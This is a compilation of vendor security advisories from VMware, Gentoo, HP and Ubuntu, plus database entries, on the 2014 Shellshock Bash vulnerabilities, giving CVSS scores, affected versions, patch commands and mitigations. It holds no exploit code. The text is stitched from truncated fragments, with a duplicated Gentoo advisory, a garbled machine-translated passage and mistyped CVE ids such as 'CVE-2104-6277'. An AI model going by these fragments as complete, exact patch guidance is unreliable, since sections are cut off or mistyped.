http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 ,
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187
- ------------------------------------------------------------------------
6. Change Log
2014-09-30 VMSA-2014-0010
Initial security advisory in conjunction with the release of
vCenter Log Insight 2.0 U1 on 2014-09-30. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
security-announce at lists.vmware.com
bugtraq at securityfocus.com
fulldisclosure at seclists.org
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware Security Response Policy
https://www.vmware.com/support/policies/security_response.html
VMware Lifecycle Policy
https://www.vmware.com/support/policies/lifecycle.html
Twitter
https://twitter.com/VMwareSRC
Copyright 2014 VMware Inc.
Please refer to the RESOLUTION
section below for a list of impacted products. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201410-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Bash: Multiple vulnerabilities
Date: October 04, 2014
Bugs: #523742, #524256
ID: 201410-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple parsing flaws in Bash could allow remote attackers to inject
code or cause a Denial of Service condition.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-shells/bash < 4.2_p52 *>= 3.1_p22
*>= 3.2_p56
*>= 4.0_p43
*>= 4.1_p16
>= 4.2_p52
Description
===========
Florian Weimer, Todd Sabin, Michal Zalewski et al. discovered further
parsing flaws in Bash. The unaffected Gentoo packages listed in this
GLSA contain the official patches to fix the issues tracked as
CVE-2014-6277, CVE-2014-7186, and CVE-2014-7187. Furthermore, the
official patch known as "function prefix patch" is included which
prevents the exploitation of CVE-2014-6278.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Bash 3.1 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-3.1_p22:3.1"
All Bash 3.2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-3.2_p56:3.2"
All Bash 4.0 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-4.0_p43:4.0"
All Bash 4.1 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-4.1_p16:4.1"
All Bash 4.2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-4.2_p52"
References
==========
[ 1 ] CVE-2014-6277
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6277
[ 2 ] CVE-2014-6278
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6278
[ 3 ] CVE-2014-7186
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7186
[ 4 ] CVE-2014-7187
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7187
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201410-01.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201409-0366 | CVE-2014-6277 |
GNU Bash shell executes commands in exported functions in environment variables
Related entries in the VARIoT exploits database: VAR-E-201409-0023, VAR-E-201409-0012, VAR-E-201409-0010, VAR-E-201409-0016, VAR-E-201410-0028, VAR-E-201410-0031, VAR-E-201410-0026, VAR-E-201410-0021, VAR-E-201410-0023, VAR-E-201409-0019, VAR-E-201410-0030, VAR-E-201410-0027, VAR-E-201410-0024, VAR-E-201410-0022, VAR-E-201409-0011, VAR-E-201409-0015, VAR-E-201410-0029, VAR-E-201409-0561, VAR-E-201409-0560, VAR-E-201409-0544, VAR-E-201409-0543, VAR-E-201409-0548, VAR-E-201409-0554, VAR-E-201409-0563, VAR-E-201409-0566, VAR-E-201409-0556, VAR-E-201409-0564, VAR-E-201409-0559, VAR-E-201409-0546, VAR-E-201409-0549, VAR-E-201409-0557, VAR-E-201409-0553, VAR-E-201409-0550, VAR-E-201409-0547 |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169. GNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04558068
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04558068
Version: 1
HPSBMU03246 rev.1 - HP Insight Control for Linux Central Management Server
Pre-boot Execution Environment running Bash Shell, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2015-02-02
Last Updated: 2015-02-02
Potential Security Impact: Multiple vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Insight
Control for Linux Central Management Server Pre-boot Execution Environment
that could be exploited remotely resulting in Denial of Service (DoS),
disclosure of information, and other vulnerabilities.
References:
CVE-2014-6271
CVE-2014-6277
CVE-2014-6278
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187
CVE-2014-7196
SSRT101742
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Insight Control for Linux Central Management Server Pre-boot Execution
Environment running Bash Shell
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7196 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following instructions to resolve these vulnerabilities.
Follow these steps to update the HP Insight Control for Linux Central
Management Server Pre-boot Execution Environment:
NOTE: The following procedure updates the bash shell on the Linux Pre-boot
Execution Environment. Please update the Bash shell version on the HP Insight
Control for Linux Central Management Server also.
1. On the Production RHEL 6.2 OS:
a. Prepare temporary directory for Bash update software:
# mkdir -p $HOME/tmp/bash
# cd $HOME/tmp/bash
# pwd
<home directory>/tmp/bash
b. Download the file 'bash-4.1.2-15.el6_4.2.i686.rpm' for Insight Control for
Linux Red Hat 6.2 i386 from https://rhn.redhat.com/errata/RHSA-2014-1311.html
to the temporary directory '$HOME/tmp/bash'.
c. Extract the Bash update software package.
# rpm2cpio bash-4.1.2-15.el6_4.2.i686.rpm| cpio -idmv
d. Verify the version of the Bash update software:
# ./bin/bash --version
GNU bash, version 4.1.2(1)-release (i686-redhat-linux-gnu)
e. Verify version dependencies:
# ldd ./bin/bash
linux-gate.so.1 => (0x008a7000)
libtinfo.so.5 => /lib/libtinfo.so.5 (0x00459000)
libdl.so.2 => /lib/libdl.so.2 (0x002c0000)
libc.so.6 => /lib/libc.so.6 (0x0012e000)
/lib/ld-linux.so.2 (0x00108000)
f. Create archive file from '/lib' to copy and install on the Insight Control
for Linux Central Management Server Pre-boot Execution Environment system:
# mkdir $HOME/tmp/lib
# cd /lib
# cp * $HOME/tmp/lib
# cd $HOME/tmp
# pwd
<home directory>/tmp
# tar cvf bash_lib.tar *
2. Download the new archive file '$HOME/tmp/bash_lib.tar' from the Production
RHEL 6.2 OS system to the Insight Control for Linux Central Management Server
Pre-boot Execution Environment system.
3. On the HP Insight Control for Linux Central Managment Server Pre-boot
Execution Environment system:
a. Create a temporary folder for the toolkit and copy the toolkit there :
# mkdir -p $HOME/tmp/temp-toolkit
# cp /usr/share/systemimager/boot/i386/standard/toolkit.tar.gz
$HOME/tmp/temp-toolkit
b. Extract the file 'toolkit.tar.gz' into the temporary folder:
# cd $HOME/tmp/temp-toolkit
# tar zxvf toolkit.tar.gz
# mv $HOME/tmp/temp-toolkit/toolkit.tar.gz /tmp
c. Verify the version of the toolkit Bash:
# $HOME/tmp/temp-toolkit/bin/bash --version
GNU bash, version 3.2.0(1)-release (i386-pc-linux-gnu) Copyright (C) 2005
Free Software Foundation, Inc.
d. Verify dependencies versions:
# ldd $HOME/tmp/temp-toolkit/bin/bash
linux-gate.so.1 => (0xffffe000)
libtermcap.so.2 => /lib/libtermcap.so.2 (0xf7f8c000)
libdl.so.2 => /lib/libdl.so.2 (0x008bf000)
libc.so.6 => /lib/libc.so.6 (0x00777000)
/lib/ld-linux.so.2 (0x00755000)
e. Extract the archive 'bash_lib.tar' to directory '$HOME/tmp/bash_lib' .
Then copy the bash binary and the library files to their respective
locations:
# tar xvf $HOME/tmp/bash_lib
# cp $HOME/tmp/bash_lib/bash/bash $HOME/tmp/temp-toolkit/bin
# cp $HOME/tmp/bash_lib/lib/* $HOME/tmp/temp-toolkit/lib
f. Create the updated toolkit gzipped archive file and place in
/usr/share/systemimager/boot/i386/standard
# tar czvf toolkit.tar.gz *
# cp toolkit.tar.gz /usr/share/systemimager/boot/i386/standard
HISTORY
Version:1 (rev.1) - 2 February 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlTP2EgACgkQ4B86/C0qfVnMkQCg8yH4xRTp9ahC3s4vDiCBmKiV
JTwAoPl3SC09DPRWwo1zluDWFF1OfMtA
=w7+V
-----END PGP SIGNATURE-----
.
This vulnerability allows users that have been granted access to a shell
script to escalate privilege and execute unrestricted commands at the same
security level as the Bash script.
HP Vertica AMI's and Virtual Machines prior to v7.1.1-0.
HP has released the following updates to resolve this vulnerability for HP
Vertica products.
Update to the latest VM image available at: https://my.vertica.com
For customers using the AMI version HP Vertica Analytics platform, please
install the latest image available at Amazon.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile
to update appropriate sections. HP is continually reviewing and enhancing the
security features of software products to provide customers with current
secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the
attention of users of the affected HP products the important security
information contained in this Bulletin. HP recommends that all users
determine the applicability of this information to their individual
situations and take appropriate action. HP does not warrant that this
information is necessarily accurate or complete for all user situations and,
consequently, HP will not be responsible for any damages resulting from
user's use or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose, title and non-infringement."
Copyright 2014 Hewlett-Packard Development Company, L.P
| VAR-201409-1147 | CVE-2014-7186 | GNU Bash shell executes commands in exported functions in environment variables |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue. QNAP Systems, Inc. Provided by QTS teeth, Turbo NAS for OS is. QTS for, GNU Bash Vulnerability (JVNVU#97219505) caused by OS Command injection vulnerability (CWE-78) Exists. This vulnerability information is based on the Information Security Early Warning Partnership. IPA Report to JPCERT/CC Coordinated with the developer. Reporter : University of Electro-Communications Wakisaka Yuki MrAny application permission OS The command may be executed.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
GNU Bash 3.2 and later are vulnerable; prior versions may also be affected.
NOTE: This vulnerability can only be exploited if the attacker already has
valid administrative login credentials. ============================================================================
Ubuntu Security Notice USN-2364-1
September 27, 2014
bash vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Bash. (CVE-2014-7186,
CVE-2014-7187)
In addition, this update introduces a hardening measure which adds prefixes
and suffixes around environment variable names which contain shell
functions.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
bash 4.3-7ubuntu1.4
Ubuntu 12.04 LTS:
bash 4.2-2ubuntu2.5
Ubuntu 10.04 LTS:
bash 4.1-2ubuntu3.4
In general, a standard system update will make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-2364-1
CVE-2014-7186, CVE-2014-7187
Package Information:
https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.4
https://launchpad.net/ubuntu/+source/bash/4.2-2ubuntu2.5
https://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.4
.
Note: All versions of HP Thin Pro and HP Smart Zero Core operating systems
prior to version 5.1.0 are affected by these vulnerabilities. Following is a
complete list of affected operating systems and Hardware Platforms Affected.
HP ThinPro:
HP ThinPro 5.0 (released June 2014)
HP ThinPro 4.4 (released November 2013)
HP ThinPro 4.3 (released June 2013)
HP ThinPro 4.2 (released November 2012)
HP ThinPro 4.1 (released March 2012)
HP ThinPro 3.2 (released November 2010)
HP ThinPro 3.1 (released June 2010)
HP ThinPro 3.0 (released November 2009)
HP ThinPro 2.0 (released 2009)
HP ThinPro 1.5 (released 2009)
HP ThinPro 1.0 (released 2008)
HP Smart Zero Core:
HP Smart Zero Core 5.0 (released June 2014)
HP Smart Zero Core 4.4 (released November 2013)
HP Smart Zero Core 4.3 (released June 2013)
HP Smart Zero Core 4.2 (released November 2012)
HP Smart Zero Core 4.1 (released March 2012)
HP Smart Zero Core 4.0 (released March 2011)
Hardware Platforms Affected:
HP t620 PLUS Flexible Quad Core Thin Client
HP t620 Flexible Dual Core Thin Client
HP t620 PLUS Flexible Dual Core Thin Client
HP t620 Flexible Quad Core Thin Client
HP t520 Flexible Thin Client
HP t505 Flexible Thin Client
HP t510 Flexible Thin Client
HP t410 All-in-One 18.5 RFX/HDX Smart ZC
HP t410 Smart Zero Client
HP t610 PLUS Flexible Thin Client
HP t610 Flexible Thin Client
HP t5565 Thin Client HP t5565z Smart Client
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10
CVE-2104-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10
CVE-2104-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10
CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10
CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10
CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has released the following software updates to resolve these
vulnerabilities.
Product Affected
Product Versions
Patch Status
HP ThinPro and HP Smart Zero Core (X86)
v5.1.0 and above
No update required; the Bash shell patch is incorporated into the base
image.
Note: If you participated in the ThinPro 5.1.0 beta program then upgrade to
the release version as soon as it becomes available.
HP ThinPro and HP Smart Zero Core (x86)
v5.0.x
A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-5.0-x86.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
HP ThinPro and HP Smart Zero Core (x86)
v4.4.x
A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-4.4-x86.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
HP ThinPro and HP Smart Zero Core (ARM)
v4.4.x
A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-4.4-arm.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
HP ThinPro and HP Smart Zero Core (X86)
v4.1, v4.2, and v4.3
A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-4.1-4.2-4.3-x86.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
HP ThinPro and HP Smart Zero Core (ARM)
v4.1, v4.2, and v4.3
A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-4.1-4.2-4.3-arm.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
HP ThinPro and HP Smart Zero Core (X86)
v3.1, v3.2, and v3.3
Download softpaq sp69382 from:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe which contains an
update package as: bash_4.1-3+deb6u2_i386.deb .
HP ThinPro and HP Smart Zero Core (ARM)
v3.1, v3.2, and v3.3
Download softpaq sp69382 from:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe which contains an
update package as: bash_4.1-3+deb6u2_armel.deb .
HP StoreEver ESL E-series Tape Library
- Disable DHCP and only use static IP addressing.
HP Virtual Library System (VLS)
- Disable DHCP and only use static IP addressing. No other firmware
stream updates are planned beyond the NX-OS 5.x and 6.x versions listed below
for the MDS products. This software versions 6.2(9a) has included the
fixes for the vulnerability in HP StoreFabric C-series MDS switches which
currently supporting NX-OS 6.X releases. This software version 5.2(8e) has included the fix
for the vulnerability in HP C-series MDS switches which currently supporting
NX-OS 5.X releases. All MDS and
Nexus 5K switches can function in this configuration. Access is available
through the console port. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201410-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Bash: Multiple vulnerabilities
Date: October 04, 2014
Bugs: #523742, #524256
ID: 201410-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple parsing flaws in Bash could allow remote attackers to inject
code or cause a Denial of Service condition.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-shells/bash < 4.2_p52 *>= 3.1_p22
*>= 3.2_p56
*>= 4.0_p43
*>= 4.1_p16
>= 4.2_p52
Description
===========
Florian Weimer, Todd Sabin, Michal Zalewski et al. discovered further
parsing flaws in Bash. The unaffected Gentoo packages listed in this
GLSA contain the official patches to fix the issues tracked as
CVE-2014-6277, CVE-2014-7186, and CVE-2014-7187. Furthermore, the
official patch known as "function prefix patch" is included which
prevents the exploitation of CVE-2014-6278.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Bash 3.1 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-3.1_p22:3.1"
All Bash 3.2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-3.2_p56:3.2"
All Bash 4.0 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-4.0_p43:4.0"
All Bash 4.1 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-4.1_p16:4.1"
All Bash 4.2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-4.2_p52"
References
==========
[ 1 ] CVE-2014-6277
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6277
[ 2 ] CVE-2014-6278
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6278
[ 3 ] CVE-2014-7186
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7186
[ 4 ] CVE-2014-7187
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7187
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201410-01.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
Open the PXE Configuration Utility on the HP Insight Control server
deployment window
Select Linux Managed from the Boot Menu options
Click the Edit button. Clicking the Edit button displays the Edit Shared Menu
Option window
Uncheck the x86 option in Operating System and Processor Options and click
OK. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04487573
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04487573
Version: 1
HPSBST03155 rev.1 - HP StoreFabric H-series switches running Bash Shell,
Remote Code Execution
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2014-11-11
Last Updated: 2014-11-11
Potential Security Impact: Remote code execution
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP StoreFabric
H-series switches running Bash Shell.
References:
CVE-2014-6271
CVE-2014-6277
CVE-2014-6278
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187
SSRT101747
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
All HP StoreFabric H-series switches
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP is actively working on a firmware update to resolve the vulnerability in
HP StoreFabric H-series switches. This bulletin will be revised when the
update is available.
MITIGATION INFORMATION
HP recommends the following steps to reduce the risk of this
vulnerability:
- Place the HP StoreFabric H-series switch and other data center
critical infrastructure behind a firewall to disallow access from the
Internet.
- Change all HP StoreFabric switch default account passwords, including
the root passwords, from the default factory passwords.
- Examine the list of accounts, including ones on the switch and those
existing on remote authentication servers such as RADIUS, LDAP, and TACAS+,
to ensure only necessary personnel can gain access to HP StoreFabric H-series
switches. Delete guest accounts and temporary accounts created for one-time
usage needs.
- To avoid possible exploit through the embedded web GUI, QuickTools,
disable the web server with the following procedure:
NOTE: After completing this procedure, the user will not be able to
manage the switch using QuickTools.
1. Login to the Command Line Interface (CLI).
2. Execute the "admin start" command to enter into an admin session.
3. Execute the "set setup services" command and change setting for
EmbeddedGUIEnabled to "False".
HISTORY
Version:1 (rev.1) - 11 November 2014 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)
iEYEARECAAYFAlRih1AACgkQ4B86/C0qfVkTcACgxGfOP4MElysfECAvNJSqkgk2
LCAAn0YGgpGgh493pj4rgB8hPH0PETxo
=X8Sm
-----END PGP SIGNATURE-----
. vulnerability.
HP GNV Website:
http://h71000.www7.hp.com/opensource/gnv.html
Sourceforge:
IA64: https://sourceforge.net/projects/gnv/files/GNV%20-%20I64/V3.0-1/
Alpha: https://sourceforge.net/projects/gnv/files/GNV%20-%20Alpha/V3.0-1/
HP Bash Version for OpenVMS
Platform
Patch Kit Name
v1.14-8
Alpha
OpenVMS V8.3, V8.4
HP-AXPVMS-GNV-BASH-V0114-08.ZIP
v1.14-8
ITANIUM
OpenVMS V8.3, V8.3-1H1, V8.4
HP-AXPVMS-GNV-BASH-V0114-08.ZIP
HISTORY
Version:1 (rev.1) - 12 January 2015 Initial release
Support: For further information, contact normal HP Services support channel.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile
to update appropriate sections. HP is continually reviewing and enhancing the
security features of software products to provide customers with current
secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the
attention of users of the affected HP products the important security
information contained in this Bulletin. HP recommends that all users
determine the applicability of this information to their individual
situations and take appropriate action. HP does not warrant that this
information is necessarily accurate or complete for all user situations and,
consequently, HP will not be responsible for any damages resulting from
user's use or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose, title and non-infringement."
Copyright 2015 Hewlett-Packard Development Company, L.P.
Note: HP and the switch vendor recommend running an active version of
Fabric OS (FOS) listed on the HP Single Point of Connectivity Knowledge
(SPOCK) website ( http://h20272.www2.hp.com/ ) and applying the work-around
information provided in the MITIGATION INFORMATION section below to protect
HP StoreFabric B-series switches from this vulnerability.
- Utilize FOS password policy management to strengthen the complexity,
age, and history requirements of switch account passwords. -----BEGIN PGP SIGNED MESSAGE-----
